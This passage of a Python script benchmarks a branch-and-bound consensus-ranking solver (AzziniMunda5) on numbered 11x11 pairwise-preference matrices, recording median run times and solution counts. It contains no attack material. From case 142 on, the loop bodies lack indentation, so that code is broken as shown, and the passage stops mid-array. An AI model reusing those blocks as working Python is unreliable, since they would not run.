        [24,35,20,24,28,26,0,24,27,27,22],
        [31,35,24,22,31,38,27,0,30,28,23],
        [22,32,22,23,27,34,24,21,0,24,21],
        [28,37,19,18,28,35,24,23,27,0,23],
        [30,27,35,22,26,30,29,28,30,28,0]]),
    np.array([  # case 129
        [0,31,16,22,23,12,35,16,22,16,32],
        [20,0,10,20,11,4,33,16,22,27,27],
        [35,41,0,35,21,11,40,21,14,35,49],
        [29,31,16,0,23,13,24,5,17,16,29],
        [28,40,30,28,0,11,33,14,20,35,35],
        [39,47,40,38,40,0,30,24,28,27,40],
        [16,18,11,27,18,21,0,14,11,17,18],
        [35,35,30,46,37,27,37,0,41,21,35],
        [29,29,37,34,31,23,40,10,0,23,37],
        [35,24,16,35,16,24,34,30,28,0,34],
        [19,24,2,22,16,11,33,16,14,17,0]]),
    np.array([  # case 130
        [0,26,30,18,22,31,19,23,29,28,25],
        [25,0,30,22,20,30,24,26,28,28,23],
        [21,21,0,14,21,27,18,19,17,22,23],
        [33,29,37,0,26,35,20,25,30,35,31],
        [29,31,30,25,0,36,25,25,28,32,29],
        [20,21,24,16,15,0,17,15,17,26,19],
        [32,27,33,31,26,34,0,26,25,27,32],
        [28,25,32,26,26,36,25,0,24,29,31],
        [22,23,34,21,23,34,26,27,0,31,26],
        [23,23,29,16,19,25,24,22,20,0,23],
        [26,28,28,20,22,32,19,20,25,28,0]]),
    np.array([  # case 131
        [0,22,23,22,25,29,28,27,32,31,27],
        [29,0,28,26,21,34,25,23,30,31,25],
        [28,23,0,23,20,29,29,25,23,30,27],
        [29,25,28,0,27,29,27,28,30,29,27],
        [26,30,31,24,0,34,31,27,26,36,28],
        [22,17,22,22,17,0,20,18,26,26,24],
        [23,26,22,24,20,31,0,20,30,23,28],
        [24,28,26,23,24,33,31,0,29,31,25],
        [19,21,28,21,25,25,21,22,0,30,18],
        [20,20,21,22,15,25,28,20,21,0,22],
        [24,26,24,24,23,27,23,26,33,29,0]]),
    np.array([  # case 132
        [0,21,18,22,20,31,13,15,24,24,24],
        [30,0,18,21,28,34,19,27,19,28,30],
        [33,33,0,24,31,39,29,33,34,36,34],
        [29,30,27,0,28,30,12,26,26,33,28],
        [31,23,20,23,0,24,21,17,25,23,26],
        [20,17,12,21,27,0,17,19,27,25,24],
        [38,32,22,39,30,34,0,31,35,36,26],
        [36,24,18,25,34,32,20,0,27,34,22],
        [27,32,17,25,26,24,16,24,0,30,28],
        [27,23,15,18,28,26,15,17,21,0,24],
        [27,21,17,23,25,27,25,29,23,27,0]]),
    np.array([  # case 133
        [0,31,28,22,27,21,23,30,19,21,18],
        [20,0,27,17,25,15,19,40,17,26,25],
        [23,24,0,17,35,16,18,31,21,29,17],
        [29,34,34,0,34,19,25,35,19,35,26],
        [24,26,16,17,0,20,24,25,22,26,22],
        [30,36,35,32,31,0,25,34,25,33,26],
        [28,32,33,26,27,26,0,33,30,36,24],
        [21,11,20,16,26,17,18,0,17,21,11],
        [32,34,30,32,29,26,21,34,0,29,23],
        [30,25,22,16,25,18,15,30,22,0,17],
        [33,26,34,25,29,25,27,40,28,34,0]]),
    np.array([  # case 134
        [0,42,40,26,42,31,20,29,24,26,30],
        [9,0,25,5,18,9,16,27,18,20,18],
        [11,26,0,13,33,27,31,21,22,24,18],
        [25,46,38,0,30,32,22,38,31,29,34],
        [9,33,18,21,0,10,9,25,24,18,21],
        [20,42,24,19,41,0,21,24,35,23,31],
        [31,35,20,29,42,30,0,29,32,23,38],
        [22,24,30,13,26,27,22,0,29,24,29],
        [27,33,29,20,27,16,19,22,0,19,21],
        [25,31,27,22,33,28,28,27,32,0,25],
        [21,33,33,17,30,20,13,22,30,26,0]]),
    np.array([  # case 135
        [0,34,25,29,33,37,35,40,23,40,24],
        [17,0,19,25,24,30,34,36,12,33,27],
        [26,32,0,25,34,36,31,42,26,35,24],
        [22,26,26,0,22,36,31,37,25,30,21],
        [18,27,17,29,0,33,38,33,20,31,18],
        [14,21,15,15,18,0,20,28,19,25,17],
        [16,17,20,20,13,31,0,21,15,29,15],
        [11,15,9,14,18,23,30,0,9,23,10],
        [28,39,25,26,31,32,36,42,0,42,32],
        [11,18,16,21,20,26,22,28,9,0,16],
        [27,24,27,30,33,34,36,41,19,35,0]]),
    np.array([  # case 136
        [0,25,23,27,23,27,24,28,20,22,20],
        [26,0,17,24,24,24,23,28,17,20,15],
        [28,34,0,29,24,29,28,32,26,25,23],
        [24,27,22,0,21,30,28,31,23,25,26],
        [28,27,27,30,0,30,29,30,25,29,26],
        [24,27,22,21,21,0,26,27,24,21,21],
        [27,28,23,23,22,25,0,27,23,22,20],
        [23,23,19,20,21,24,24,0,19,16,14],
        [31,34,25,28,26,27,28,32,0,29,25],
        [29,31,26,26,22,30,29,35,22,0,21],
        [31,36,28,25,25,30,31,37,26,30,0]]),
    np.array([  # case 137
        [0,22,29,29,41,28,33,28,20,32,32],
        [29,0,19,29,29,24,29,24,29,37,27],
        [22,32,0,47,51,24,28,38,28,22,18],
        [22,22,4,0,12,18,22,18,28,22,12],
        [10,22,0,39,0,18,10,18,16,18,12],
        [23,27,27,33,33,0,33,41,33,21,19],
        [18,22,23,29,41,18,0,28,28,8,12],
        [23,27,13,33,33,10,23,0,19,21,13],
        [31,22,23,23,35,18,23,32,0,12,12],
        [19,14,29,29,33,30,43,30,39,0,33],
        [19,24,33,39,39,32,39,38,39,18,0]]),
    np.array([  # case 138
        [0,16,10,11,26,25,19,16,21,21,26],
        [35,0,25,36,36,25,26,16,36,36,18],
        [41,26,0,33,40,25,23,16,15,30,26],
        [40,15,18,0,19,26,23,16,18,26,23],
        [25,15,11,32,0,19,21,12,22,22,16],
        [26,26,26,25,32,0,26,15,15,15,16],
        [32,25,28,28,30,25,0,26,18,18,33],
        [35,35,35,35,39,36,25,0,36,35,26],
        [30,15,36,33,29,36,33,15,0,39,33],
        [30,15,21,25,29,36,33,16,12,0,26],
        [25,33,25,28,35,35,18,25,18,25,0]]),
    np.array([  # case 139
        [0,21,25,21,23,21,25,21,22,24,22],
        [30,0,32,27,28,26,31,28,24,29,29],
        [26,19,0,28,25,23,25,19,20,22,24],
        [30,24,23,0,27,25,26,24,27,22,25],
        [28,23,26,24,0,25,28,30,22,22,25],
        [30,25,28,26,26,0,29,18,27,28,21],
        [26,20,26,25,23,22,0,24,22,25,26],
        [30,23,32,27,21,33,27,0,22,31,29],
        [29,27,31,24,29,24,29,29,0,24,28],
        [27,22,29,29,29,23,26,20,27,0,25],
        [29,22,27,26,26,30,25,22,23,26,0]]),
    np.array([  # case 140
        [0,26,24,25,16,29,22,22,25,19,30],
        [25,0,31,26,22,33,26,28,28,18,24],
        [27,20,0,30,19,34,31,28,35,28,36],
        [26,25,21,0,17,26,16,17,28,12,18],
        [35,29,32,34,0,36,27,27,39,19,36],
        [22,18,17,25,15,0,11,24,26,14,24],
        [29,25,20,35,24,40,0,23,34,24,33],
        [29,23,23,34,24,27,28,0,33,23,34],
        [26,23,16,23,12,25,17,18,0,17,24],
        [32,33,23,39,32,37,27,28,34,0,29],
        [21,27,15,33,15,27,18,17,27,22,0]]),
    np.array([  # case 141
        [0,19,26,20,30,27,22,23,24,29,33],
        [32,0,32,23,34,30,22,26,28,28,30],
        [25,19,0,17,29,30,21,22,18,24,32],
        [31,28,34,0,32,29,33,27,21,30,33],
        [21,17,22,19,0,30,19,19,16,26,30],
        [24,21,21,22,21,0,25,18,26,23,27],
        [29,29,30,18,32,26,0,28,26,27,31],
        [28,25,29,24,32,33,23,0,23,27,31],
        [27,23,33,30,35,25,25,28,0,34,29],
        [22,23,27,21,25,28,24,24,17,0,34],
        [18,21,19,18,21,24,20,20,22,17,0]]),
]

for _case_id, om in enumerate(_case_matrices, start=104):
    # Time `rep` independent runs of the branch-and-bound solver.
    times = np.zeros(rep)
    for i in range(rep):
        # Algorithm with Condorcet winner
        # float("inf") is the initial cost bound (presumably "no upper
        # bound" -- TODO confirm in alg).
        algorithm = alg.AzziniMunda5(om, float("inf"))
        start_time = time.time()
        sol = algorithm.execute()
        t = (time.time() - start_time)
        times[i] = t
        #print(t)
    # Median damps outlier repetitions (GC pauses, scheduler noise).
    exec_time = np.median(times)
    # Result row: [matrix size, 51, case id, method tag, median time,
    # number of solutions, tentative count], then the per-rep timings.
    # NOTE(review): 51 is presumably the voter count -- confirm upstream.
    result = np.append(np.array([11, 51, _case_id, "ME-BB", exec_time,
                                 sol.shape[0], algorithm.ntentative],
                                dtype=np.dtype(object)), times)
    print(result[:7])
    results = np.vstack((results, result))
##############################################################
##############################################################
om = np.array([
[0,31,26,20,30,23,26,25,17,24,24],
[20,0,26,18,25,25,27,29,22,28,22],
[25,25,0,25,22,21,23,29,24,27,27],
[31,33,26,0,32,25,32,30,26,31,26],
[21,26,29,19,0,23,30,26,17,29,26],
[28,26,30,26,28,0,23,28,23,23,19],
[25,24,28,19,21,28,0,27,22,25,24],
[26,22,22,21,25,23,24,0,17,20,27],
[34,29,27,25,34,28,29,34,0,29,24],
[27,23,24,20,22,28,26,31,22,0,22],
[27,29,24,25,25,32,27,24,27,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 142, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,32,25,19,25,25,22,24,28,26],
[24,0,22,24,22,26,23,24,25,30,26],
[19,29,0,23,24,25,33,27,23,28,26],
[26,27,28,0,20,28,26,23,28,25,29],
[32,29,27,31,0,26,29,24,23,32,32],
[26,25,26,23,25,0,26,31,22,26,27],
[26,28,18,25,22,25,0,24,25,29,29],
[29,27,24,28,27,20,27,0,26,26,27],
[27,26,28,23,28,29,26,25,0,27,29],
[23,21,23,26,19,25,22,25,24,0,23],
[25,25,25,22,19,24,22,24,22,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 143, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,30,25,32,27,26,33,32,26,25],
[25,0,25,21,27,25,22,31,37,22,22],
[21,26,0,24,33,28,25,28,31,24,27],
[26,30,27,0,33,27,27,37,35,25,29],
[19,24,18,18,0,15,15,30,26,21,16],
[24,26,23,24,36,0,24,28,33,25,28],
[25,29,26,24,36,27,0,28,32,25,28],
[18,20,23,14,21,23,23,0,29,20,17],
[19,14,20,16,25,18,19,22,0,19,20],
[25,29,27,26,30,26,26,31,32,0,27],
[26,29,24,22,35,23,23,34,31,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 144, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,19,30,32,21,23,38,30,23,25],
[15,0,21,23,25,24,20,33,29,22,23],
[32,30,0,27,29,31,29,39,25,30,22],
[21,28,24,0,37,28,27,42,30,25,28],
[19,26,22,14,0,30,31,36,31,18,28],
[30,27,20,23,21,0,26,33,28,23,21],
[28,31,22,24,20,25,0,27,27,23,35],
[13,18,12,9,15,18,24,0,15,11,20],
[21,22,26,21,20,23,24,36,0,13,25],
[28,29,21,26,33,28,28,40,38,0,31],
[26,28,29,23,23,30,16,31,26,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 145, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,38,30,32,29,29,31,27,21,22,31],
[13,0,15,29,22,25,23,25,19,13,14],
[21,36,0,33,29,21,21,28,30,25,14],
[19,22,18,0,23,17,18,13,26,20,11],
[22,29,22,28,0,19,20,24,31,18,22],
[22,26,30,34,32,0,30,31,35,23,28],
[20,28,30,33,31,21,0,24,30,26,13],
[24,26,23,38,27,20,27,0,25,22,19],
[30,32,21,25,20,16,21,26,0,19,17],
[29,38,26,31,33,28,25,29,32,0,26],
[20,37,37,40,29,23,38,32,34,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 146, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,20,26,27,20,24,18,31,29,30],
[19,0,20,29,25,18,29,26,31,25,41],
[31,31,0,35,23,18,33,24,36,31,36],
[25,22,16,0,21,21,14,23,25,21,29],
[24,26,28,30,0,28,22,30,29,31,37],
[31,33,33,30,23,0,23,26,24,25,31],
[27,22,18,37,29,28,0,21,22,32,37],
[33,25,27,28,21,25,30,0,33,28,29],
[20,20,15,26,22,27,29,18,0,18,30],
[22,26,20,30,20,26,19,23,33,0,33],
[21,10,15,22,14,20,14,22,21,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 147, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,25,30,27,26,31,26,29,27,30],
[30,0,33,31,30,29,35,34,23,31,34],
[26,18,0,27,31,28,35,30,26,26,30],
[21,20,24,0,22,23,28,22,16,20,22],
[24,21,20,29,0,27,29,28,26,22,27],
[25,22,23,28,24,0,33,26,28,23,25],
[20,16,16,23,22,18,0,22,24,22,21],
[25,17,21,29,23,25,29,0,22,26,24],
[22,28,25,35,25,23,27,29,0,27,26],
[24,20,25,31,29,28,29,25,24,0,25],
[21,17,21,29,24,26,30,27,25,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 148, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,31,24,34,30,24,22,25,27,27],
[20,0,25,22,24,25,22,18,24,21,25],
[20,26,0,27,27,24,26,23,23,21,20],
[27,29,24,0,31,28,29,20,30,30,24],
[17,27,24,20,0,23,20,20,23,18,21],
[21,26,27,23,28,0,27,22,23,23,22],
[27,29,25,22,31,24,0,23,21,24,25],
[29,33,28,31,31,29,28,0,29,27,24],
[26,27,28,21,28,28,30,22,0,24,23],
[24,30,30,21,33,28,27,24,27,0,23],
[24,26,31,27,30,29,26,27,28,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 149, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,22,26,20,31,25,19,24,25,24],
[25,0,20,23,21,27,19,21,28,21,27],
[29,31,0,29,23,32,31,23,28,28,32],
[25,28,22,0,22,28,22,28,26,26,31],
[31,30,28,29,0,29,31,25,32,26,33],
[20,24,19,23,22,0,19,21,25,20,24],
[26,32,20,29,20,32,0,24,30,25,31],
[32,30,28,23,26,30,27,0,31,28,33],
[27,23,23,25,19,26,21,20,0,23,25],
[26,30,23,25,25,31,26,23,28,0,26],
[27,24,19,20,18,27,20,18,26,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 150, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,20,23,17,14,8,22,15,29,20],
[25,0,25,20,23,25,10,16,14,28,22],
[31,26,0,35,16,31,8,22,15,29,17],
[28,31,16,0,27,17,14,14,10,23,15],
[34,28,35,24,0,31,28,22,24,30,28],
[37,26,20,34,20,0,19,28,28,37,25],
[43,41,43,37,23,32,0,24,19,36,26],
[29,35,29,37,29,23,27,0,32,42,27],
[36,37,36,41,27,23,32,19,0,24,22],
[22,23,22,28,21,14,15,9,27,0,14],
[31,29,34,36,23,26,25,24,29,37,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 151, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,25,28,23,26,25,30,25,29,21],
[29,0,25,31,25,26,19,29,24,29,22],
[26,26,0,22,28,31,24,28,26,30,22],
[23,20,29,0,25,26,20,31,28,25,26],
[28,26,23,26,0,23,23,29,27,25,18],
[25,25,20,25,28,0,24,27,22,23,16],
[26,32,27,31,28,27,0,26,25,35,23],
[21,22,23,20,22,24,25,0,27,24,24],
[26,27,25,23,24,29,26,24,0,28,18],
[22,22,21,26,26,28,16,27,23,0,19],
[30,29,29,25,33,35,28,27,33,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 152, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,22,26,28,20,31,24,31,29,34],
[30,0,26,23,33,31,31,31,30,34,35],
[29,25,0,23,32,27,29,25,25,31,32],
[25,28,28,0,27,29,31,28,30,35,31],
[23,18,19,24,0,21,31,27,26,29,29],
[31,20,24,22,30,0,31,27,28,34,33],
[20,20,22,20,20,20,0,28,28,25,26],
[27,20,26,23,24,24,23,0,32,26,29],
[20,21,26,21,25,23,23,19,0,23,27],
[22,17,20,16,22,17,26,25,28,0,29],
[17,16,19,20,22,18,25,22,24,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 153, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,30,32,28,29,28,20,29,24,26],
[26,0,28,31,31,27,23,29,27,25,24],
[21,23,0,28,26,30,24,23,29,29,29],
[19,20,23,0,24,28,24,21,28,21,27],
[23,20,25,27,0,21,21,22,26,29,20],
[22,24,21,23,30,0,25,27,27,25,25],
[23,28,27,27,30,26,0,22,27,24,25],
[31,22,28,30,29,24,29,0,32,21,22],
[22,24,22,23,25,24,24,19,0,21,20],
[27,26,22,30,22,26,27,30,30,0,27],
[25,27,22,24,31,26,26,29,31,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 154, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,20,18,20,16,23,23,20,23,21],
[34,0,27,24,24,25,29,32,27,28,26],
[31,24,0,22,23,21,21,25,23,25,28],
[33,27,29,0,27,23,26,29,28,31,26],
[31,27,28,24,0,20,30,31,25,30,27],
[35,26,30,28,31,0,30,28,25,29,29],
[28,22,30,25,21,21,0,33,26,22,30],
[28,19,26,22,20,23,18,0,23,23,28],
[31,24,28,23,26,26,25,28,0,27,28],
[28,23,26,20,21,22,29,28,24,0,28],
[30,25,23,25,24,22,21,23,23,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 155, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,35,33,27,25,33,28,34,34,26],
[15,0,20,18,21,18,19,15,27,21,20],
[16,31,0,23,27,26,23,17,29,25,18],
[18,33,28,0,24,22,22,27,28,29,18],
[24,30,24,27,0,26,27,30,34,32,25],
[26,33,25,29,25,0,28,34,35,32,28],
[18,32,28,29,24,23,0,26,29,35,24],
[23,36,34,24,21,17,25,0,32,30,19],
[17,24,22,23,17,16,22,19,0,24,17],
[17,30,26,22,19,19,16,21,27,0,22],
[25,31,33,33,26,23,27,32,34,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 156, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,32,26,26,29,33,28,24,20,21],
[24,0,25,25,28,20,25,26,25,23,23],
[19,26,0,25,23,18,28,24,20,20,21],
[25,26,26,0,25,20,35,30,30,24,25],
[25,23,28,26,0,22,26,28,20,25,17],
[22,31,33,31,29,0,33,35,28,26,26],
[18,26,23,16,25,18,0,25,21,15,20],
[23,25,27,21,23,16,26,0,19,20,17],
[27,26,31,21,31,23,30,32,0,22,26],
[31,28,31,27,26,25,36,31,29,0,24],
[30,28,30,26,34,25,31,34,25,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 157, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,30,28,24,24,22,25,19,21,25],
[21,0,24,21,21,19,18,24,16,21,23],
[21,27,0,22,19,18,25,25,17,27,22],
[23,30,29,0,18,27,25,24,22,26,26],
[27,30,32,33,0,29,28,23,28,26,23],
[27,32,33,24,22,0,27,25,20,25,27],
[29,33,26,26,23,24,0,29,24,30,24],
[26,27,26,27,28,26,22,0,17,24,24],
[32,35,34,29,23,31,27,34,0,35,35],
[30,30,24,25,25,26,21,27,16,0,27],
[26,28,29,25,28,24,27,27,16,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 158, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,21,28,28,24,25,32,22,22,30],
[31,0,31,30,36,29,38,38,23,25,23],
[30,20,0,28,29,18,27,36,21,32,21],
[23,21,23,0,30,25,29,31,20,24,22],
[23,15,22,21,0,15,19,30,14,20,18],
[27,22,33,26,36,0,28,38,24,26,22],
[26,13,24,22,32,23,0,26,18,30,24],
[19,13,15,20,21,13,25,0,9,17,13],
[29,28,30,31,37,27,33,42,0,31,23],
[29,26,19,27,31,25,21,34,20,0,23],
[21,28,30,29,33,29,27,38,28,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 159, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,18,24,22,37,35,28,26,32,25,27],
[33,0,26,28,39,26,21,28,36,31,33],
[27,25,0,20,22,33,22,30,32,27,25],
[29,23,31,0,27,30,19,27,34,28,34],
[14,12,29,24,0,25,10,19,30,20,27],
[16,25,18,21,26,0,17,24,30,25,24],
[23,30,29,32,41,34,0,29,33,34,35],
[25,23,21,24,32,27,22,0,29,24,33],
[19,15,19,17,21,21,18,22,0,24,22],
[26,20,24,23,31,26,17,27,27,0,34],
[24,18,26,17,24,27,16,18,29,17,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 160, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,30,30,26,26,24,30,28,28,23],
[27,0,32,28,25,28,25,26,26,32,23],
[21,19,0,24,23,20,15,23,18,24,18],
[21,23,27,0,26,24,23,26,22,29,22],
[25,26,28,25,0,24,26,25,25,32,24],
[25,23,31,27,27,0,23,29,25,29,22],
[27,26,36,28,25,28,0,29,26,35,20],
[21,25,28,25,26,22,22,0,23,29,27],
[23,25,33,29,26,26,25,28,0,31,24],
[23,19,27,22,19,22,16,22,20,0,19],
[28,28,33,29,27,29,31,24,27,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 161, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,37,27,28,23,33,28,22,29,33],
[22,0,22,12,22,16,27,26,24,25,23],
[14,29,0,23,28,24,23,31,19,24,21],
[24,39,28,0,34,29,29,41,25,30,26],
[23,29,23,17,0,21,22,30,25,21,32],
[28,35,27,22,30,0,33,34,26,26,34],
[18,24,28,22,29,18,0,29,26,24,24],
[23,25,20,10,21,17,22,0,27,25,20],
[29,27,32,26,26,25,25,24,0,28,26],
[22,26,27,21,30,25,27,26,23,0,26],
[18,28,30,25,19,17,27,31,25,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 162, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,8,23,20,26,27,18,27,8,16,17],
[43,0,43,21,43,27,37,34,18,35,18],
[28,8,0,28,25,19,26,27,18,23,10],
[31,30,23,0,38,32,32,32,30,38,33],
[25,8,26,13,0,27,19,27,11,10,10],
[24,24,32,19,24,0,34,25,9,17,33],
[33,14,25,19,32,17,0,34,16,15,8],
[24,17,24,19,24,26,17,0,17,24,17],
[43,33,33,21,40,42,35,34,0,25,25],
[35,16,28,13,41,34,36,27,26,0,25],
[34,33,41,18,41,18,43,34,26,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 163, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,14,20,17,8,20,21,25,18,29],
